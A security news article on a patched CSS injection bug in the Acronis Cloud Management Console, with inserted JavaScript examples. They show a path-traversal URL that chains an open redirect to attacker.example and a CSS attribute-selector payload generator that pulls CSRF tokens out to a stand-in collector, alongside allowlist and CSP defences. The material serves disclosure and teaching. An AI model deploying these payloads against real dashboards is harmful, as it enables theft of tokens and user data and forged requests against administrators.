A CSS injection bug in the Acronis Cloud Management Console has been patched

The flaw could be chained into CSRF attacks and used to exfiltrate information from the admin dashboard

A security researcher has discovered a CSS injection flaw in Acronis software that could be exploited for data theft. On November 4, ‘Medi’ (who goes by the alias ‘mr-medi’) published a technical analysis of the vulnerability, describing the client-side path traversal as their “favorite bug” to date.

The vulnerability was found in the Acronis Cloud Management Console, the web interface used to manage Acronis services, including cloud backups and resource monitoring. According to the researcher, the console’s front-end code reads a GET parameter called color_scheme from the page URL and uses its value to build the path of a stylesheet, which it then requests and loads.

The front-end code does not sanitize that value before building the stylesheet path, so an attacker can perform path traversal and make the browser request the stylesheet from a different location on the same origin. On its own, this relative path overwrite is not a significant bug. It becomes one when combined with an open redirect: the traversed request can be pointed at an endpoint that redirects to an external domain where a malicious CSS file is hosted, and the browser will load that file as the page’s stylesheet.

Medi found exactly that combination: an API endpoint on the console that copied a user-controlled GET parameter into the Location header of its HTTP response. Chaining the two, the researcher built a URL whose color_scheme parameter traversed to that endpoint and redirected to an attacker-controlled domain, allowing user information to be extracted “using CSS attributes”.
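The mechanism above, as an added illustration rather than Acronis’s own front-end code: a stylesheet loader that splices the raw color_scheme value into a path, beside an allowlist-based fix and a same-origin check. The hostname console.example.com, the /static/css/ directory, the /api/redirect?next= open-redirect endpoint and the attacker.example domain are all assumptions made for the example; nothing here reflects the real endpoint the researcher used.

```javascript
// Added example modelling the bug class, not Acronis's front-end code.
// Assumed layout: the console is served from https://console.example.com,
// stylesheets live under /static/css/, and /api/redirect?next= is a
// hypothetical open redirect on the same origin.

// Vulnerable: the raw color_scheme value is spliced into the stylesheet path.
// "../" segments walk out of /static/css/, and an embedded "?" turns the rest
// of the value into a query string for whatever endpoint the traversal reaches.
function vulnerableStylesheetUrl(pageUrl) {
  const scheme = new URL(pageUrl).searchParams.get('color_scheme') || 'light';
  return new URL(`/static/css/${scheme}.css`, pageUrl).href;
}

// Hardened: map the parameter onto a fixed allowlist of scheme names, so the
// value can never contribute path separators, dot segments or a query string.
const ALLOWED_SCHEMES = new Set(['light', 'dark']);
function hardenedStylesheetUrl(pageUrl) {
  const raw = new URL(pageUrl).searchParams.get('color_scheme');
  const scheme = ALLOWED_SCHEMES.has(raw) ? raw : 'light';
  return new URL(`/static/css/${scheme}.css`, pageUrl).href;
}

// Defence in depth: before injecting a <link>, refuse any stylesheet URL that
// resolved outside the expected directory, off-origin, or with a query string.
function isExpectedStylesheet(href, pageUrl) {
  const u = new URL(href);
  const page = new URL(pageUrl);
  return (
    u.origin === page.origin &&
    u.pathname.startsWith('/static/css/') &&
    u.search === ''
  );
}

// Constructed attacker URL: traverse into the redirect endpoint, with the
// redirect target URL-encoded so it survives query-string parsing. The ".css"
// the loader appends lands on the attacker's filename, which is convenient.
const ATTACK_URL =
  'https://console.example.com/dashboard?color_scheme=' +
  encodeURIComponent('../../api/redirect?next=https://attacker.example/evil');

console.log('vulnerable loader fetches:', vulnerableStylesheetUrl(ATTACK_URL));
console.log('hardened loader fetches:  ', hardenedStylesheetUrl(ATTACK_URL));
```

With the attack URL, the vulnerable loader resolves to https://console.example.com/api/redirect?next=https://attacker.example/evil.css, which is the open redirect rather than a stylesheet; the hardened loader falls back to the default light.css. The allowlist is the real fix: sanitizing dot segments alone would still leave an absolute-path or query-string variant to worry about.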

That information includes cross-site request forgery (CSRF) tokens, personal data, partner hashes, and anything else present in the Document Object Model (DOM) of the page into which the attacker’s CSS file is injected. “If we specify our CSS file on a hosted domain, we can perform a CSRF attack via GET requests by loading an external image using CSS properties such as background-image, or by collecting user information such as [an] IP, Referer header [or] User-Agent,” explained the researcher. “I used my local server, but you can look it up on any external domain you own.”
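How a hostile stylesheet pulls a CSRF token out of the DOM, as an added example that is not the researcher’s proof of concept: each CSS rule uses an attribute selector to test one more character of a form field’s value, and the rule that matches requests a background image whose URL carries the guess, so the collector learns the token one character at a time. The same url() trick with the target URL is the GET-based CSRF the researcher describes. The attacker host https://attacker.example/leak, the field name csrf_token and the hex alphabet are assumptions; the browserWouldFetch function stands in for a real browser, which would need one stylesheet load (or an @import chain) per round.

```javascript
// Added example, not the researcher's PoC. Demonstrates CSS attribute-selector
// exfiltration of a CSRF token from an injected stylesheet.
// Assumptions: collector at attacker.example, token in <input name="csrf_token">,
// token drawn from a hex alphabet.
const COLLECTOR = 'https://attacker.example/leak';
const ALPHABET = '0123456789abcdef';

// One round of rules for a known prefix: one rule per candidate next character.
// Hidden inputs are not rendered, so background images on them are never
// fetched; the first rule forces the element to render.
function buildExfilCss(prefix, alphabet = ALPHABET) {
  const rules = alphabet.split('').map((ch) => {
    const guess = prefix + ch;
    return (
      `input[name="csrf_token"][value^="${guess}"]` +
      `{background-image:url("${COLLECTOR}?t=${encodeURIComponent(guess)}")}`
    );
  });
  return ['input[name="csrf_token"]{display:block}', ...rules].join('\n');
}

// Stand-in for the browser: given the stylesheet and the real token, return
// the URL whose rule matches (the request the collector would receive).
function browserWouldFetch(css, token) {
  const rule = /\[value\^="([^"]*)"\]\{background-image:url\("([^"]*)"\)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    if (token.startsWith(m[1])) return m[2];
  }
  return null; // no prefix matched: the token is exhausted or off-alphabet
}

// Attacker loop: extend the prefix from each leaked request until nothing
// matches. A character outside the alphabet stops recovery early, which is
// why real payloads cover the full character set the target uses.
function recoverToken(token, alphabet = ALPHABET) {
  let prefix = '';
  for (;;) {
    const fetched = browserWouldFetch(buildExfilCss(prefix, alphabet), token);
    if (fetched === null) return prefix;
    prefix = new URL(fetched).searchParams.get('t');
  }
}

console.log(buildExfilCss('3f').split('\n').slice(0, 3).join('\n'));
console.log('recovered:', recoverToken('3fa9c'));
```

The defence is the same one that matters for every CSS injection: never let user input decide which stylesheet the page loads, and keep a Content Security Policy style-src that excludes attacker-reachable origins, so a redirected stylesheet is blocked even if the loader is fooled.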


Medi told The Daily Swig: “Since this is a client-side-based attack, the main risk is the information found in the vulnerable page and CSRF attacks. The type of bug depends on how JavaScript handles user input and the purpose of that parameter.”

A chain reaction
A video proof-of-concept (PoC) of the attack has been published. Medi also notes that the technique is closely related to relative path overwrite (RPO) and path-relative stylesheet import (PRSSI) vulnerabilities.

“For example, in Acronis, the vulnerable page is an admin dashboard that contains valuable information about their customers [and] the parameter is used to dynamically apply styles… Other scenarios can lead to XSS, with serious issues like CSRF [via] any HTTP method.”

Medi’s findings were disclosed privately through the HackerOne platform, and the flaw was fixed on January 13. A $250 bug bounty was awarded, and Medi has confirmed that the bug is now fixed. On HackerOne, the Acronis team rated the flaw as comparable to reflected cross-site scripting (XSS), a classification that carries a lower bounty, even though the bug exposes user data on any page where the color_scheme parameter is used. The Daily Swig has reached out to Acronis for further comment and will update this story when we hear back.
